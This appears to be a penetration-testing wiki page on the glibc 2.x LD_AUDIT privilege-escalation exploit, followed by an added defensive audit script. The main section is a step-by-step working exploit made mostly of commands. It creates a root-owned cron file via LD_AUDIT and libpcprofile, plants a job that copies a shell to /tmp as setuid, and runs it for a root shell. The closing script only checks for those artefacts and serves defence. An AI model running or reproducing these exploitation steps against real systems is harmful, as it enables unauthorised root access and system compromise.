# GNU C Library

## GNU C Library 2.x (libc6)

GNU C Library 2.x (libc6) has a public local privilege-escalation exploit:

{% embed url="https://www.exploit-db.com/exploits/15304" %}
GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation
{% endembed %}

## Enumeration

```bash
ldd --version
```

## Exploitation

**Step 1:** The file-creation mask (umask) is inherited by child processes and survives even a setuid execve, so it controls the permissions of any file the privileged process creates during exploitation.

```bash
umask 0
```

**Step 2:** Confirm that libpcprofile.so is present; it is distributed with the libc package.

```bash
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
```

**Step 3:** One of the libpcprofile constructors is unsafe to run with elevated privileges: it creates the file named in the PCPROFILE_OUTPUT environment variable. Loaded through LD_AUDIT by a setuid binary, it creates that file as root with the permissive mode set in step 1.

```bash
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ls -l /etc/cron.d/exploit
```

**Step 4:** Set up a cron job that, running as root, copies a shell to /tmp and marks it setuid.

```bash
printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
# cron picks the job up within a minute; the setuid copy appears after it runs
ls -l /tmp/exploit
```

**Step 5:** Run the setuid copy to get a root shell.

```bash
/tmp/exploit
```
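As an added defender-side check (not part of the page above or of the exploit-db entry), the following POSIX shell functions look for the artefacts the steps above leave behind: a group- or world-writable entry under /etc/cron.d (what umask 0 produces) and a setuid file in /tmp, alongside the libc version from `ldd --version`. The directory arguments are parameters (defaulting to the real paths) so the checks can be run against a test tree; the function names and the `--run` flag are assumptions of this example.

```shell
#!/bin/sh
# Audit for the artefacts of the LD_AUDIT/libpcprofile privilege-escalation technique.
# Directory arguments default to the real system paths; pass other paths to test it.

# Report the glibc version (first line of `ldd --version`), or "unknown" if ldd is absent.
glibc_version() {
    v=$(ldd --version 2>/dev/null | head -n 1)
    [ -n "$v" ] && printf '%s\n' "$v" || printf 'unknown\n'
}

# List cron.d entries that are group- or world-writable. cron runs these as root,
# so any writable entry is a finding (ownership by a non-root user would be another).
find_weak_cron_entries() {
    dir="${1:-/etc/cron.d}"
    [ -d "$dir" ] || return 0
    find "$dir" -maxdepth 1 -type f \( -perm -020 -o -perm -002 \) 2>/dev/null
}

# List setuid files directly under a world-writable scratch directory such as /tmp;
# a setuid copy of a shell there is the persistence artefact from step 4.
find_setuid_in_scratch() {
    dir="${1:-/tmp}"
    [ -d "$dir" ] || return 0
    find "$dir" -maxdepth 1 -type f -perm -4000 2>/dev/null
}

# Run all checks against the live system; returns non-zero if anything was found.
audit_host() {
    printf 'libc: %s\n' "$(glibc_version)"
    weak=$(find_weak_cron_entries /etc/cron.d)
    suid=$(find_setuid_in_scratch /tmp)
    [ -n "$weak" ] && printf 'writable cron.d entries:\n%s\n' "$weak"
    [ -n "$suid" ] && printf 'setuid files in /tmp:\n%s\n' "$suid"
    [ -z "$weak" ] && [ -z "$suid" ]
}

# Only audit the live host when explicitly asked (assumed flag), so the file can be sourced.
if [ "${1:-}" = "--run" ]; then
    audit_host
fi
```

Invoke it as `sh audit.sh --run` on a host; a non-zero exit status means at least one artefact was found.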
